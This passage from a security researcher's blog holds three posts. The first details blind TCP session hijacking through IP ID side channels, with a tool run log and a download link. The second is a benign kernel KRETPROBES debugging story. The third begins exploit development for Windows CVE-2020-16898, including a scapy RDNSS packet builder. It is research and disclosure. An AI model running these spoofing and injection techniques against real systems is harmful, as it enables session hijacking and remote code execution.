Taking this into consideration, we can more easily scan the sequence number space to find the server’s SND.NEXT. Each guess will involve the sending of two packets, each with its SEQ field set to the guessed server’s SND.NEXT. The first packet (resp. second packet) will have his ACK field set to ack1 (resp. ack2), so that we are sure that if the guessed’s SND.NEXT is correct, at least one of the two packet will be accepted.

The sequence number space is way bigger than the client-port space, but two facts make this scan easier:

First, when the client receive our packet, it replies immediately. There’s not a problem with latency between client and server like in the client-port scan. Thus, the time between the two IP ID probes can be very small, speeding up our scanning and reducing greatly the odds that the client will have IP traffic between our probes and mess with our detection.

Secondly, it’s not necessary to test all the possible sequence numbers, because of the receiver’s window. In fact, we need only to do approx. (2^32 / client’s RCV.WND) guesses at worst (this fact has already been mentionned in [6]). Of course, we don’t know the client’s RCV.WND.
We can take a wild guess of RCV.WND=64K, perform the scan (trying each SEQ multiple of 64K). Then, if we didn’t find anything, wen can try all SEQs such as seq = 32K + i64K for all i. Then, all SEQ such as seq=16k + i32k, and so on… narrowing the window, while avoiding to re-test already tried SEQs. On a typical “modern” connection, this scan usually takes less than 15 minutes with our tool.

With the server’s SND.NEXT known, and a method to work around our ignorance of the ACK, we may hijack the connection in the way “server -> client”. This is not bad, but not terribly useful, we’d prefer to be able to send data from the client to the server, to make the client execute a command, etc… In order to do this, we need to find the client’s SND.NEXT.

And here is a small, weird difference in Windows 7. Described scenario perfectly works for Windows XP but I’ve encountered a different behavior in Windows 7. Having two edge cases as ACK value to fulfill ACK formula doesn’t really change anything and I have exactly the same results (just in Windows 7) just by always using one of the edge values for ACK. Originally, I thought that my implementation of attack is not working against Windows 7. However, after some tests and tuning it turns out that’s not the case. I’m not sure why or what I’m missing but, in the end, you can send less packages (twice less) and speed-up the overall attack.

Finding the client’s SND.NEXT

Quote:

What we can do to find the client’s SND.NEXT ? Obviously we can’t use the same method as for the server’s SND.NEXT, because the server’s OS is probably not vunerable to this attack, and besides, the heavy network traffic on the server would render the IP ID analysis infeasible.

However, we know the server’s SND.NEXT. We also know that the client’s SND.NEXT is used for checking the ACK fields of client’s incoming packets.
So we can send packets from the server to the client with SEQ field set to server’s SND.NEXT, pick an ACK, and determine (again with IP ID) if our ACK was acceptable.

If we detect that our ACK was acceptable, that means that (guessed_ACK – SND.NEXT) <= 0. Otherwise, it means.. well, you guessed it, that (guessed_ACK – SND_NEXT) > 0.

Using this knowledge, we can find the exact SND_NEXT in at most 32 tries by doing a binary search (a slightly modified one, because the sequence space is circular).

Now, at last we have all the required informations and we can perform the session hijacking from either client or server.

(Un)fortunately, here Windows 7 is different as well. This is connected to the differences in the previous stage of how it handles correctness of ACK. Regardless of the guessed_ACK value ((guessed_ACK - SND.NEXT) <= 0 or (guessed_ACK - SND_NEXT) > 0) Windows 7 won’t send any package back to the server. Essentially, we are blind here and we can’t do the same amazingly effective ‘binary search’ to find the correct ACK. However, we are not completely lost here. We can always brute force ACK if we have the correct SQN. Again, we don’t need to verify every possible value of ACK, we can still use the same trick with TCP window size. Nevertheless, to be more effective and not miss the correct ACK brackets, I’ve chosen to use window size value as 0x3FF. Essentially, we are flooding the server with the spoofed packets containing our payload for injection, with the correct SQN and guessed ACK. This operation takes around 5 minutes and is effective 🙂 Nevertheless, if for any reason our payload is not injected, a smaller TCP window size (e.g., 0xFF) should be chosen.

Important notes

  1. This type of attack is not limited to any specific OS, but rather leverages “covert channel” generated by implementing IP_ID as a global counter. In short, any OS which is vulnerable to the “Idle scan” is also vulnerable to the old-school blind TCP/IP Hijacking attack.
  2. We need to be able to send spoofed IP packets to execute this attack.
    • Our attack relies on “scanning” and constant “poking” of IP_ID:
    • Any latency between victim and the server affects such logic.
    • If victim’s machine is overloaded (heavy or slow traffic) it obviously affects the attack. Taking appropriate measures of the victim’s networking performance might be necessary for correct tuning of the attack.

Proof-of-Concept

Originally, I implemented lkm’s attack in 2008 and I tested it against Windows XP. When I ran compiled binary on the modern system, everything was working fine. However, when I took the original sources and wanted to recompile it on the modern Linux environment, my tool stopped working(!). New binary was not able to find client’s port neither SQN. However, old binary still worked perfectly fine. It was a riddle for me what was really happening. Output of strace tool gave me some clues:

Generated packet from the old binary:

sendmsg(4, {msg_name={sa_family=AF_INET, sin_port=htons(21), sin_addr=inet_addr("192.168.1.169")}, msg_namelen=16, msg_iov=[{iov_base="E\0\0(\0\0\0\0@\6\0\0\300\250\1\356\300\250\1\251\277\314\0\25\0\0\0224\0\0VxP\2\26\320\353\234\0\0", iov_len=40}], msg_iovlen=1, msg_control=[{cmsg_len=24, cmsg_level=SOL_IP, cmsg_type=IP_PKTINFO, cmsg_data={ipi_ifindex=0, ipi_spec_dst=inet_addr("0.0.0.0"), ipi_addr=inet_addr("0.0.0.0")}}], msg_controllen=24, msg_flags=0}, 0) = 40

Generated packet from the new binary:

sendmsg(4, {msg_name={sa_family=AF_INET, sin_port=htons(21), sin_addr=inet_addr("192.168.1.169")}, msg_namelen=16, msg_iov=[{iov_base="E\0\0(\0\0\0\0@\6\0\0\300\250\1\356\300\250\1\251\277\314\0\25\0\0\0224\0\0VxP\2\26\320\2563\0\0", iov_len=40}], msg_iovlen=1, msg_control=[{cmsg_len=28, cmsg_level=SOL_IP, cmsg_type=IP_PKTINFO, cmsg_data={ipi_ifindex=0, ipi_spec_dst=inet_addr("0.0.0.0"), ipi_addr=inet_addr("0.0.0.0")}}], msg_controllen=32, msg_flags=0}, 0) = 40

cmsg_len and msg_controllen has different values. However, I didn’t modify the source code so how is it possible? Some GCC/Glibc changes broke the functionality of sending the spoofed package. I’ve found the answer here:

https://sourceware.org/pipermail/libc-alpha/2016-May/071274.html

I needed to rewrite spoofing function to make it functional again on the modern Linux environment. However, to do that I needed to use different API. I wonder how many non-offensive tools were broken by this change 🙂

Windows 7

I’ve tested this tool against fully updated Windows 7. Surprisingly, rewriting PoC was not the most difficult task… setting up a fully updated Windows 7 is much more problematic. Many updates break update channel/service(!) itself and you need to manually fix it. Usually, it means manual downloading of the specific KB and installing it in “safe mode”. Then it can “unlock” update service and you can continue your work. In the end it took me around 2-3 days to get fully updated Windows 7 and it looks like this:

192.168.1.132 – attacker’s IP address
192.168.1.238 – victim’s Windows 7 machine IP address
192.168.1.169 – FTP server running on Linux. I’ve tested ProFTPd and vsFTP servers running under git TOT kernel (5.11+)

This tool does not do appropriate “tuning” per victim which could significantly speed-up the attack. However, in my specific case, the full attack which means finding client’s port address, finding server’s SQN and finding client’s SQN took about 45 minutes.

I found old logs from attacking Windows XP (~2009) and the entire attack took almost an hour:

pi3-darkstar z_new # time ./test -r 192.168.254.20 -s 192.168.254.46 -l 192.168.254.31 -p 21 -P 5357 -c 49450 -C “PWD”

                …::: -=[ [d]evil_pi3 TCP/IP Blind Spoofer by Adam ‘pi3’ Zabrocki ]=- :::…

        [+] Trying to find client port
        [+] Found port => 49456!
        [+] Veryfing… OK! 🙂

        [+] Second level of verifcation
        [+] Found port => 49456!
        [+] Veryfing… OK! 🙂

        [!!] Port is found (49456)! Let’s go further…

        [+] Trying to find server’s window SQN
       [+] Found server’s window SQN => 1874825280, with ACK => 758086748 with seq_offset => 65535
        [+] Rechecking…
       [+] Found server’s window SQN => 1874825280, with ACK => 758086748 with seq_offset => 65535

        [!!] SQN => 1874825280, with seq_offset => 65535

        [+] Trying to find server’s real SQN
        [+] Found server’s real SQN => 1874825279 => seq_offset 32767
        [+] Found server’s real SQN => 1874825277 => seq_offset 16383
        [+] Found server’s real SQN => 1874825275 => seq_offset 8191
        [+] Found server’s real SQN => 1874825273 => seq_offset 4095
        [+] Found server’s real SQN => 1874823224 => seq_offset 2047
        [+] Found server’s real SQN => 1874822199 => seq_offset 1023
        [+] Found server’s real SQN => 1874821686 => seq_offset 511
        [+] Found server’s real SQN => 1874821684 => seq_offset 255
        [+] Found server’s real SQN => 1874821555 => seq_offset 127
        [+] Found server’s real SQN => 1874821553 => seq_offset 63
        [+] Found server’s real SQN => 1874821520 => seq_offset 31
        [+] Found server’s real SQN => 1874821518 => seq_offset 15
        [+] Found server’s real SQN => 1874821509 => seq_offset 7
        [+] Found server’s real SQN => 1874821507 => seq_offset 3
        [+] Found server’s real SQN => 1874821505 => seq_offset 1
        [+] Found server’s real SQN => 1874821505 => seq_offset 1
        [+] Rechecking…
        [+] Found server’s real SQN => 1874821505 => seq_offset 1
        [+] Found server’s real SQN => 1874821505 => seq_offset 1

        [!!] Real server’s SQN => 1874821505

        [+] Finish! check whether command was injected (should be :))

        [!] Next SQN [1874822706]

real    56m38.321s
user    0m8.955s
sys     0m29.181s
pi3-darkstar z_new #

Some more notes:

  • Sometimes you can see that tool is spinning around the same value when trying to find “server’s real SQN”. If next to the number in the parentheses you see number 1, kill the attack, copy calculated SQN (the one around which value tool was spinning) and paste it as an SQN start parameter (-M). It should fix that edge case.
  • Sometimes you can encounter the problem that scanning by 64KB window size can ‘overjump’ the appropriate SQN brackets. You might want to reduce the window size to be smaller. However, tools should change the window size automatically if it finishes scanning the full SQN range with current window size and didn’t find the correct value. Nevertheless, it takes time. You might want to start scanning with the smaller window size (but that implies longer attack).
  • By default, tool sends ICMP message to the victim’s machine to read IP_ID. However, I’ve implemented functionality that it can read that field from any IP packet. It sends standard SYN packet and waits for reply to extract IP_ID. Please give an appropriate TCP port to appropriate parameter (-P)

Tool can be found here:

http://site.pi3.com.pl/exp/devil_pi3.c

Closing words

Modern operating systems (like Windows 10) usually implement IP_ID as a “local” counter per session. If you monitor IP_ID in specific session, you can see it is just incremented per each sent packet. However, each session has independent IP_ID base.

Happy hacking,
Adam

The short story of broken KRETPROBES and OPTIMIZER in Linux Kernel

By: pi3
15 December 2020 at 19:34

The short story of broken KRETPROBES and OPTIMIZER in Linux Kernel.

During the LKRG development process I’ve found that:

  • KRETPROBES are broken since kernel 5.8 (fixed in upcoming kernel)
  • OPTIMIZER was not doing sufficient job since kernel 5.5

First things first – KPROBES and FTRACE:

Linux kernel provides 2 amazing frameworks for hooking – K*ROBES and FTRACE. K*PROBES is older and a classic one – introduced in 2.6.9 (October 2004). However, FTRACE is a newer interface and might have smaller overhead comparing to K*PROBES. I’m using a word “K*PROBES” because various types of K*PROBES were availble in the kernel, including JPROBES, KRETPROBES or classic KPROBES. K*PROBES essentially enables the possibility to dynamically break into any kernel routine. What are the differences between various K*PROBES?

  • KPROBES – can be placed on virtually any instruction in the kernel
  • JPROBES – were implemented using KPROBES. The main idea behind JPROBES was to employ a simple mirroring principle to allow seamless access to the probed function’s arguments. However, since 2017 JPROBEs were depreciated. More information can be found here:
    https://lwn.net/Articles/735667/
  • KRETPROBES – sometimes they are called “return probes” and they also use KPROBES under-the-hood. KRETPROBES allows to easily execute user’s own routine at the entry and return path to the hooked function.However, KRETPROBES can’t be placed on arbitrary instructions.

When a KPROBE is registered, it makes a copy of the probed instruction and replaces the first byte(s) of the probed instruction with a breakpoint instruction (e.g., int3 on i386 and x86_64).

FTRACE are newer comparing to K*PROBES and were initially introduced in kernel 2.6.27, which was released on October 9, 2008. FTRACE works completely differently and the main idea is based on instrumenting every compiled function (injecting a “long-NOP” instruction – GCC’s option “-pg”). When FTRACE is being registered on the specific function, such “long-NOP” is being replaced with JUMP instruction which points to the trampoline code. Later such trampoline can execute any pre-registered user-defined hook.

A few words about Linux Kernel Runtime Guard (LKRG)

In short, LKRG performs runtime integrity checking of the Linux kernel (similar to PatchGuard technology from Microsoft) and detection of the various exploits against the kernel. LKRG attempts to post-detect and promptly respond to unauthorized modifications to the running Linux kernel (system integrity) or to corruption of the task integrity such as credentials (user/group IDs), SECCOMP/sandbox rules, namespaces, and more.
To be able to implement such functionality, LKRG must place various hooks in the kernel. KRETPROBES are used to fulfill that requirement.

LKRG’s KPROBE on FTRACE instrumented functions

A careful reader might ask an interesting question: what will happen if the function is instrumented by the FTRACE (injected “long-NOP”) and someone registers K*PROBES on it? Does dynamically registered FTRACE “overwrite” K*PROBES installed on that function and vice versa?

Well, this is a very common situation from LKRG’s perspective, since it is placing KRETPROBES on many syscalls. Linux kernel uses a special type of K*PROBES in such case and it is called “FTRACE-based KPROBES”. Essentially, such special KPROBE is using FTRACE infrastructure and has very little to do with KPROBES itself. That’s interesting because it is also subject to FTRACE rules e.g. if you disable FTRACE infrastructure, such special KPROBE won’t work either.

OPTIMIZER

Linux kernel developers went one step forward and they aggressively “optimize” all K*PROBES to use FTRACE instead. The main reason behind that is performance – FTRACE has smaller overhead. If for any reason such KPROBE can’t be optimized, then classic old-school KPROBES infrastructure is used.

When you analyze all KRETPROBES placed by LKRG, you will realize that on modern kernels all of them are being converted to some type of FTRACE 🙂

LKRG reports False Positives

After such a long introduction finally, we can move on to the topic of this article. Vitaly Chikunov from ALT Linux reported that when he runs FTRACE stress tester, LKRG reports corruption of .text section:

https://github.com/openwall/lkrg/issues/12

I spent a few weeks (month+) on making LKRG detect and accept authorized third-party modifications to the kernel’s code placed via FTRACE. When I finally finished that work, I realized that additionally, I need to protect the global FTRACE knob (sysctl kernel.ftrace_enabled), which allows root to completely disable FTRACE on a running system. Otherwise, LKRG’s hooks might be unknowingly disabled, which not only disables its protections (kind of OK under a threat model where we trust host root), but may also lead to false positives (as without the hooks LKRG wouldn’t know which modifications are legitimate). I’ve added that functionality, and everything was working fine…
… until kernel 5.9. This completely surprised me. I’ve not seen any significant changes between 5.8.x and 5.9.x in FTRACE logic. I spent some time on that and finally I realized that my protection of global FTRACE knob stopped working on latest kernels (since 5.9). However, this code was not changed between kernel 5.8.x and 5.9.x. What’s the mystery?

First problem – KRETPROBES are broken.

Starting from kernel 5.8 all non-optimized KRETPROBES don’t work. Until 5.8, when #DB exception was raised, entry to the NMI was not fully performed. Among others, the following logic was executed:
https://elixir.bootlin.com/linux/v5.7.19/source/arch/x86/kernel/traps.c#L589

if (!user_mode(regs)) {
    rcu_nmi_enter();
    preempt_disable();
}

In some older kernels function ist_enter() was called instead. Inside this function we can see the following logic:
https://elixir.bootlin.com/linux/v5.7.19/source/arch/x86/kernel/traps.c#L91

if (user_mode(regs)) {
    RCU_LOCKDEP_WARN(!rcu_is_watching(), "entry code didn't wake RCU");
} else {
    /*
     * We might have interrupted pretty much anything.  In
     * fact, if we're a machine check, we can even interrupt
     * NMI processing.  We don't want in_nmi() to return true,
     * but we need to notify RCU.
     */
    rcu_nmi_enter();
}

preempt_disable();

As the comment says “We don’t want in_nmi() to return true, but we need to notify RCU.“. However, since kernel 5.8 the logic of how interrupts are handled was modified and currently we have this (function “exc_int3“):
https://elixir.bootlin.com/linux/v5.8/source/arch/x86/kernel/traps.c#L630

/*
 * idtentry_enter_user() uses static_branch_{,un}likely() and therefore
 * can trigger INT3, hence poke_int3_handler() must be done
 * before. If the entry came from kernel mode, then use nmi_enter()
 * because the INT3 could have been hit in any context including
 * NMI.
 */
if (user_mode(regs)) {
    idtentry_enter_user(regs);
    instrumentation_begin();
    do_int3_user(regs);
    instrumentation_end();
    idtentry_exit_user(regs);
} else {
    nmi_enter();
    instrumentation_begin();
    trace_hardirqs_off_finish();
    if (!do_int3(regs))
        die("int3", regs, 0);
    if (regs->flags & X86_EFLAGS_IF)
        trace_hardirqs_on_prepare();
    instrumentation_end();
    nmi_exit();
}

The root of unlucky change comes from this commit:

https://github.com/torvalds/linux/commit/0d00449c7a28a1514595630735df383dec606812#diff-51ce909c2f65ed9cc668bc36cc3c18528541d8a10e84287874cd37a5918abae5

which was later modified by this commit:

https://github.com/torvalds/linux/commit/8edd7e37aed8b9df938a63f0b0259c70569ce3d2

and this is what we currently have in all kernels since 5.8. Essentially, KRETPROBES are not working since these commits. We have the following logic:

asm_exc_int3() -> exc_int3():
                    |
    ----------------|
    |
    v
...
nmi_enter();
...
if (!do_int3(regs))
       |
  -----|
  |
  v
do_int3() -> kprobe_int3_handler():
                    |
    ----------------|
    |
    v
...
if (!p->pre_handler || !p->pre_handler(p, regs))
                             |
    -------------------------|
    |
    v
...
pre_handler_kretprobe():
...
    if (unlikely(in_nmi())) {
        rp->nmissed++;
        return 0;
    }

Essentially, exc_int3() calls nmi_enter(), and pre_handler_kretprobe() before invoking any registered KPROBE verifies if it is not in NMI via in_nmi() call.

I’ve reported this issue to the maintainers and it was addressed and correctly fixed. These patches are going to be backported to the stable tree (and hopefully to LTS kernels as well):

https://lists.openwall.net/linux-kernel/2020/12/09/1313

However, coming back to the original problem with LKRG… I didn’t see any issues with kernel 5.8.x but with 5.9.x. It’s interesting because KRETPROBES were broken in 5.8.x as well. So what’s going on?

As I mentioned at the beginning of the article, K*PROBES are aggressively optimized and converted to FTRACE. In kernel 5.8.x LKRG’s hook was correctly optimized and didn’t use KRETPROBES at all. That’s why I didn’t see any problems with this version. However, for some reasons, such optimization was not possible in kernel 5.9.x. This results in placing classic non-optimized KRETPROBES which we know is broken.

Second problem – OPTIMIZER isn’t doing sufficient job anymore.

I didn’t see any changes in the sources regarding the OPTIMIZER, neither in the hooked function itself. However, when I looked at the generated vmlinux binary, I saw that GCC generated a padding at the end of the hooked function using INT3 opcode:

...
ffffffff8130528b:       41 bd f0 ff ff ff       mov    $0xfffffff0,%r13d
ffffffff81305291:       e9 fe fe ff ff          jmpq   ffffffff81305194
ffffffff81305296:       cc                      int3
ffffffff81305297:       cc                      int3
ffffffff81305298:       cc                      int3
ffffffff81305299:       cc                      int3
ffffffff8130529a:       cc                      int3
ffffffff8130529b:       cc                      int3
ffffffff8130529c:       cc                      int3
ffffffff8130529d:       cc                      int3
ffffffff8130529e:       cc                      int3
ffffffff8130529f:       cc                      int3

Such padding didn’t exist in this function in generated images for older kernels. Nevertheless, such padding is pretty common.

OPTIMIZER logic fails here:

try_to_optimize_kprobe() -> alloc_aggr_kprobe() -> __prepare_optimized_kprobe()
-> arch_prepare_optimized_kprobe() -> can_optimize():
/* Decode instructions */
addr = paddr - offset;
while (addr < paddr - offset + size) { /* Decode until function end */
    unsigned long recovered_insn;
    if (search_exception_tables(addr))
        /*
         * Since some fixup code will jumps into this function,
         * we can't optimize kprobe in this function.
         */
        return 0;
    recovered_insn = recover_probed_instruction(buf, addr);
    if (!recovered_insn)
        return 0;
    kernel_insn_init(&insn, (void *)recovered_insn, MAX_INSN_SIZE);
    insn_get_length(&insn);
    /* Another subsystem puts a breakpoint */
    if (insn.opcode.bytes[0] == INT3_INSN_OPCODE)
        return 0;
    /* Recover address */
    insn.kaddr = (void *)addr;
    insn.next_byte = (void *)(addr + insn.length);
    /* Check any instructions don't jump into target */
    if (insn_is_indirect_jump(&insn) ||
        insn_jump_into_range(&insn, paddr + INT3_INSN_SIZE,
                 DISP32_SIZE))
        return 0;
    addr += insn.length;
}

One of the checks tries to protect from the situation when another subsystem puts a breakpoint there as well:

    /* Another subsystem puts a breakpoint */
    if (insn.opcode.bytes[0] == INT3_INSN_OPCODE)
        return 0;

However, that’s not the case here. INT3_INSN_OPCODE is placed at the end of the function as padding.
I wanted to find out why INT3 padding is more common in the new kernels while it’s not the case for older ones even though I’m using exactly the same compiler and linker. I’ve started browsing commits and I’ve found this one:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=7705dc8557973d8ad8f10840f61d8ec805695e9e

diff --git a/arch/x86/kernel/vmlinux.lds.S b/arch/x86/kernel/vmlinux.lds.S
index b06d6e1188deb..3a1a819da1376 100644
--- a/arch/x86/kernel/vmlinux.lds.S
+++ b/arch/x86/kernel/vmlinux.lds.S
@@ -144,7 +144,7 @@ SECTIONS
 		*(.text.__x86.indirect_thunk)
 		__indirect_thunk_end = .;
 #endif
-	} :text = 0x9090
+	} :text =0xcccc
 
 	/* End of text section, which should occupy whole number of pages */
 	_etext = .;

It looks like INT3 is now a default padding used by the linker.

I’ve brought up that problem with the Linux kernel developers (KPROBES owners), and Masami Hiramatsu prepared appropriate patch which fixes the problem:

https://lists.openwall.net/linux-kernel/2020/12/11/265

I’ve verified it and now it works well. Thanks to LKRG development work we helped identify and fix two interesting problems in Linux kernel 🙂

Thanks,
Adam

CVE-2020-16898 – Exploiting “Bad Neighbor” vulnerability

By: pi3
16 October 2020 at 18:57

Introduction

During the last Patch Tuesday (13th of October 2020), Microsoft fixed a very interesting (and sexy) vulnerability: CVE-2020-16898 – Windows TCP/IP Remote Code Execution Vulnerability (link). Microsoft’s description of the vulnerability:

“A remote code execution vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets. An attacker who successfully exploited this vulnerability could gain the ability to execute code on the target server or client.
To exploit this vulnerability, an attacker would have to send specially crafted ICMPv6 Router Advertisement packets to a remote Windows computer.
The update addresses the vulnerability by correcting how the Windows TCP/IP stack handles ICMPv6 Router Advertisement packets.”

This vulnerability is so important that I’ve decided to write a Proof-of-Concept for it. During my work there weren’t any public exploits for it. I’ve spent a significant amount of time analyzing all the necessary caveats needed for triggering the bug. Even now, available information doesn’t provide sufficient details for triggering the bug. That’s why I’ve decided to summarize my experience. First, short summary:

  • This bug can ONLY be exploited when source address is link-local IPv6. This requirement is limiting the potential targets!
  • The entire payload must be a valid IPv6 packet. If you screw-up headers too much, your packet will be rejected before triggering the bug
  • During the process of validating the size of the packet, all defined “length” in Optional headers must match the packet size
  • This vulnerability allows to smuggle an extra “header”. This header is not validated and includes “Length” field. After triggering the bug, this field will be inspected against the packet size anyway.
  • Windows NDIS API, which can trigger the bug, has a very annoying optimization (from the exploitation perspective). To be able to bypass it, you need to use fragmentation! Otherwise, you can trigger the bug, but it won’t result in memory corruption!

Collecting information about the vulnerability

At first, I wanted to learn more about the bug. The only extra information which I could find were the write-ups provided by the detection logic. This is quite a funny twist of fate that the information on how to protect against attack was helpful in exploitation 🙂 Write-ups:

The most crucial is the following information:

“While we ignore all Options that aren’t RDNSS, for Option Type = 25 (RDNSS), we check to see if the Length (second byte in the Option) is an even number. If it is, we flag it. If not, we continue. Since the Length is counted in increments of 8 bytes, we multiply the Length by 8 and jump ahead that many bytes to get to the start of the next Option (subtracting 1 to account for the length byte we’ve already consumed).”

OK, what we have learned from it? Quite a lot:

  • We need to send RDNSS packet
  • The problem is an even number in the Length field
  • Function responsible for parsing the packet will reference the last 8 bytes of RDNSS payload as a next header

That’s more than enough to start poking around. First, we need to generate a valid RDNSS packet.

RDNSS

Recursive DNS Server Option (RDNSS) is one of the sub-options for Router Advertisement (RA) message. RA can be sent via ICMPv6. Let’s look at the documentation for RDNSS (https://tools.ietf.org/html/rfc5006):

5.1. Recursive DNS Server Option
The RDNSS option contains one or more IPv6 addresses of recursive DNS
servers. All of the addresses share the same lifetime value. If it
is desirable to have different lifetime values, multiple RDNSS
options can be used. Figure 1 shows the format of the RDNSS option.

  0                   1                   2                   3
  0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 |     Type      |     Length    |           Reserved            |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 |                           Lifetime                            |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 |                                                               |
 :            Addresses of IPv6 Recursive DNS Servers            :
 |                                                               |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Description of the Length field:

 Length        8-bit unsigned integer.  The length of the option
               (including the Type and Length fields) is in units of
               8 octets.  The minimum value is 3 if one IPv6 address
               is contained in the option.  Every additional RDNSS
               address increases the length by 2.  The Length field
               is used by the receiver to determine the number of
               IPv6 addresses in the option.

This essentially means that Length must always be an odd number as long as there is any payload.
OK, let’s create a RDNSS package. How to do it? I’m using scapy since it’s the easiest and fasted way for creating any packages which we want. It is very simple:

v6_dst = <destination address>
v6_src = <source address>

c = ICMPv6NDOptRDNSS()
c.len = 7
c.dns = [ "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]

pkt = IPv6(dst=v6_dst, src=v6_src, hlim=255) / ICMPv6ND_RA() / c
send(pkt)

When we set-up a kernel debugger and analyze all the public symbols from the tcpip.sys driver we can find interesting function names:

tcpip!Ipv6pHandleRouterAdvertisement
tcpip!Ipv6pUpdateRDNSS

Let’s try to set the breakpoints there and see if our package arrives:

0: kd> bp tcpip!Ipv6pUpdateRDNSS
0: kd> bp tcpip!Ipv6pHandleRouterAdvertisement
0: kd> g
Breakpoint 0 hit
tcpip!Ipv6pHandleRouterAdvertisement:
fffff804`483ba398 48895c2408      mov     qword ptr [rsp+8],rbx
0: kd> kpn
 # Child-SP          RetAddr           Call Site
00 fffff804`48a66ad8 fffff804`483c04e0 tcpip!Ipv6pHandleRouterAdvertisement
01 fffff804`48a66ae0 fffff804`4839487a tcpip!Icmpv6ReceiveDatagrams+0x340
02 fffff804`48a66cb0 fffff804`483cb998 tcpip!IppProcessDeliverList+0x30a
03 fffff804`48a66da0 fffff804`483906df tcpip!IppReceiveHeaderBatch+0x228
04 fffff804`48a66ea0 fffff804`4839037c tcpip!IppFlcReceivePacketsCore+0x34f
05 fffff804`48a66fb0 fffff804`483b24ce tcpip!IpFlcReceivePackets+0xc
06 fffff804`48a66fe0 fffff804`483b19a2 tcpip!FlpReceiveNonPreValidatedNetBufferListChain+0x25e
07 fffff804`48a670d0 fffff804`45a4f698 tcpip!FlReceiveNetBufferListChainCalloutRoutine+0xd2
08 fffff804`48a67200 fffff804`45a4f60d nt!KeExpandKernelStackAndCalloutInternal+0x78
09 fffff804`48a67270 fffff804`483a1741 nt!KeExpandKernelStackAndCalloutEx+0x1d
0a fffff804`48a672b0 fffff804`4820b530 tcpip!FlReceiveNetBufferListChain+0x311
0b fffff804`48a67550 ffffcb82`f9dfb370 0xfffff804`4820b530
0c fffff804`48a67558 fffff804`48a676b0 0xffffcb82`f9dfb370
0d fffff804`48a67560 00000000`00000000 0xfffff804`48a676b0
0: kd> g
...

Hm… OK. We never hit Ipv6pUpdateRDNSS but we did hit Ipv6pHandleRouterAdvertisement. This means that our package is fine. Why the hell we did not end up in Ipv6pUpdateRDNSS?

Problem 1 – IPv6 link-local address

We are failing validation of the address here:

fffff804`483ba4b4 458a02          mov     r8b,byte ptr [r10]
fffff804`483ba4b7 8d5101          lea     edx,[rcx+1]
fffff804`483ba4ba 8d5902          lea     ebx,[rcx+2]
fffff804`483ba4bd 41b7c0          mov     r15b,0C0h
fffff804`483ba4c0 4180f8ff        cmp     r8b,0FFh
fffff804`483ba4c4 0f84a8820b00    je      tcpip!Ipv6pHandleRouterAdvertisement+0xb83da (fffff804`48472772)
fffff804`483ba4ca 33c0            xor     eax,eax
fffff804`483ba4cc 498bca          mov     rcx,r10
fffff804`483ba4cf 48898570010000  mov     qword ptr [rbp+170h],rax
fffff804`483ba4d6 48898578010000  mov     qword ptr [rbp+178h],rax
fffff804`483ba4dd 4484d2          test    dl,r10b
fffff804`483ba4e0 0f8599820b00    jne     tcpip!Ipv6pHandleRouterAdvertisement+0xb83e7 (fffff804`4847277f)
fffff804`483ba4e6 4180f8fe        cmp     r8b,0FEh
fffff804`483ba4ea 0f85ab820b00    jne     tcpip!Ipv6pHandleRouterAdvertisement+0xb8403 (fffff804`4847279b) [br=0]

r10 points to the beginning of the address:

0: kd> dq @r10
ffffcb82`f9a5b03a  000052b0`80db12fd e5f5087c`645d7b5d
ffffcb82`f9a5b04a  000052b0`80db12fd b7220a02`ea3b3a4d
ffffcb82`f9a5b05a  08070800`e56c0086 00000000`00000000
ffffcb82`f9a5b06a  ffffffff`00000719 aaaaaaaa`aaaaaaaa
ffffcb82`f9a5b07a  aaaaaaaa`aaaaaaaa aaaaaaaa`aaaaaaaa
ffffcb82`f9a5b08a  aaaaaaaa`aaaaaaaa aaaaaaaa`aaaaaaaa
ffffcb82`f9a5b09a  aaaaaaaa`aaaaaaaa 63733a6e`12990c28
ffffcb82`f9a5b0aa  70752d73`616d6568 643a6772`6f2d706e

These bytes:

ffffcb82`f9a5b03a  000052b0`80db12fd e5f5087c`645d7b5d

are matching my IPv6 address which I’ve used as a source address:

v6_src = "fd12:db80:b052:0:5d7b:5d64:7c08:f5e5"

It is compared with byte 0xFE. By looking here We can learn that:

fe80::/10 — Addresses in the link-local prefix are only valid and unique on a single link (comparable to the auto-configuration addresses 169.254.0.0/16 of IPv4).

OK, so it is looking for the link-local prefix. Another interesting check is when we fail the previous one:

fffff804`4847279b e8f497f8ff      call    tcpip!IN6_IS_ADDR_LOOPBACK (fffff804`483fbf94)
fffff804`484727a0 84c0            test    al,al
fffff804`484727a2 0f85567df4ff    jne     tcpip!Ipv6pHandleRouterAdvertisement+0x166 (fffff804`483ba4fe)
fffff804`484727a8 4180f8fe        cmp     r8b,0FEh
fffff804`484727ac 7515            jne     tcpip!Ipv6pHandleRouterAdvertisement+0xb842b (fffff804`484727c3)

It is checking if we are coming from the LOOPBACK, and next we are validated again for being the link-local. I’ve modified the packet to use link-local address and…

Breakpoint 1 hit
tcpip!Ipv6pUpdateRDNSS:
fffff804`4852a534 4055            push    rbp
0: kd> kpn
 # Child-SP          RetAddr           Call Site
00 fffff804`48a66728 fffff804`48472cbf tcpip!Ipv6pUpdateRDNSS
01 fffff804`48a66730 fffff804`483c04e0 tcpip!Ipv6pHandleRouterAdvertisement+0xb8927
02 fffff804`48a66ae0 fffff804`4839487a tcpip!Icmpv6ReceiveDatagrams+0x340
03 fffff804`48a66cb0 fffff804`483cb998 tcpip!IppProcessDeliverList+0x30a
